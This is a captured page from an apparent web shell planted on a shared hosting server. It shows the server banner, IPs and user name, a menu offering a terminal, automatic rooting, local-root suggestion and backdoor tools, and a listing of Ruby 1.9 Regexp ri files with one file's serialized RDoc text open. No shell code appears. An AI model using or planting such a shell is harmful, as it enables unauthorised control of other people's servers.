Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
Regexp /
Delete
Unzip
Name
Size
Permission
Date
Action
%3d%3d%3d-i.ri
578
B
-rw-r--r--
2023-07-26 17:26
%3d%3d-i.ri
622
B
-rw-r--r--
2023-07-26 17:26
%3d%7e-i.ri
1.71
KB
-rw-r--r--
2023-07-26 17:26
%7e-i.ri
417
B
-rw-r--r--
2023-07-26 17:26
as_json-i.ri
288
B
-rw-r--r--
2023-07-26 17:26
casefold%3f-i.ri
444
B
-rw-r--r--
2023-07-26 17:26
cdesc-Regexp.ri
31.27
KB
-rw-r--r--
2023-07-26 17:26
compile-c.ri
216
B
-rw-r--r--
2023-07-26 17:26
encoding-i.ri
275
B
-rw-r--r--
2023-07-26 17:26
eql%3f-i.ri
626
B
-rw-r--r--
2023-07-26 17:26
escape-c.ri
610
B
-rw-r--r--
2023-07-26 17:26
fixed_encoding%3f-i.ri
1.37
KB
-rw-r--r--
2023-07-26 17:26
hash-i.ri
269
B
-rw-r--r--
2023-07-26 17:26
inspect-i.ri
497
B
-rw-r--r--
2023-07-26 17:26
json_create-c.ri
381
B
-rw-r--r--
2023-07-26 17:26
last_match-c.ri
1.22
KB
-rw-r--r--
2023-07-26 17:26
match-i.ri
1.05
KB
-rw-r--r--
2023-07-26 17:26
named_captures-i.ri
809
B
-rw-r--r--
2023-07-26 17:26
names-i.ri
509
B
-rw-r--r--
2023-07-26 17:26
new-c.ri
1.34
KB
-rw-r--r--
2023-07-26 17:26
options-i.ri
1.03
KB
-rw-r--r--
2023-07-26 17:26
quote-c.ri
608
B
-rw-r--r--
2023-07-26 17:26
source-i.ri
443
B
-rw-r--r--
2023-07-26 17:26
to_json-i.ri
313
B
-rw-r--r--
2023-07-26 17:26
to_s-i.ri
1.02
KB
-rw-r--r--
2023-07-26 17:26
try_convert-c.ri
704
B
-rw-r--r--
2023-07-26 17:26
union-c.ri
1.08
KB
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::AnyMethod[iI" to_s:ETI"Regexp#to_s;TF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"RReturns a string containing the regular expression and its options (using the;TI"L<code>(?opts:source)</code> notation. This string can be fed back in to;TI"P<code>Regexp::new</code> to a regular expression with the same semantics as;TI"Lthe original. (However, <code>Regexp#==</code> may not return true when;TI"Jcomparing the two, as the source of the regular expression itself may;TI"Kdiffer, as the example shows). <code>Regexp#inspect</code> produces a;TI"3generally more readable version of <i>rxp</i>.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"*r1 = /ab+c/ix #=> /ab+c/ix ;FI"0s1 = r1.to_s #=> "(?ix-m:ab+c)" ;FI"0r2 = Regexp.new(s1) #=> /(?ix-m:ab+c)/ ;FI"'r1 == r2 #=> false ;FI"(r1.source #=> "ab+c" ;FI"/r2.source #=> "(?ix-m:ab+c)";F: @file0I"rxp.to_s -> str ;T0[ I"();FI" re.c;T